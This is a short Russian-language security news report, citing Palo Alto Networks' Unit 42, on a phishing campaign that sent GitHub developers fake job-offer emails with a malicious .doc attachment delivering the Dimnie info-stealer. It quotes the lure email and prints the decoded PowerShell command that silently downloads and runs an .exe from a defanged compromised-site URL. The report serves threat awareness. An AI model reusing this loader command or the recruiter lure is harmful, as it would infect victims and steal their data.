В середине января группе исследователей стало известно о том, что некоторые разработчики получали письма с вредоносными вложениями. Владельцы аккаунтов GitHub получили письма с подобным содержанием:

Привет! 

Меня зовут Адам Бахбиндер, я посмотрел твой репозиторий, и он впечатлил меня.
В моей компании есть позиция, которая как раз тебе подходит.

Пожалуйста, посмотри вложенные в письмо описания вакансии и компании.
Свяжись со мной по email, указанному в документе.

Всего хорошего,
Адам

Было получено много аналогичных вариантов сообщения, но все они содержали один и тот же вредоносный .doc-файл. В этом файле содержался код, который запускал PowerShell-скрипт. После этого происходила загрузка и запуск .exe-файла. Вот читаемая версия скрипта:

cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/
margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'"

В начале зловред казался стандартным, но в процессе изучения стало понятно, что вредоносный код, который вызывается в результате исполнения скрипта, достаточно известен в сфере кибербезопасности. Вирус, известный как Dimnie, внедряется в основные процессы операционной системы для кражи информации. Изначально данная технология была ориентирована на заражение российских пользователей, но за 3 года (впервые разновидность этого вируса была обнаружена в 2014 году) он «мутировал», став более скрытным и распространившись за пределы России.

Подробности о схеме работы Dimnie можно прочитать в отчёте команды Unit 42, обратившей внимание на эту волну фишинговых писем.

Источник: Palo Alto Networks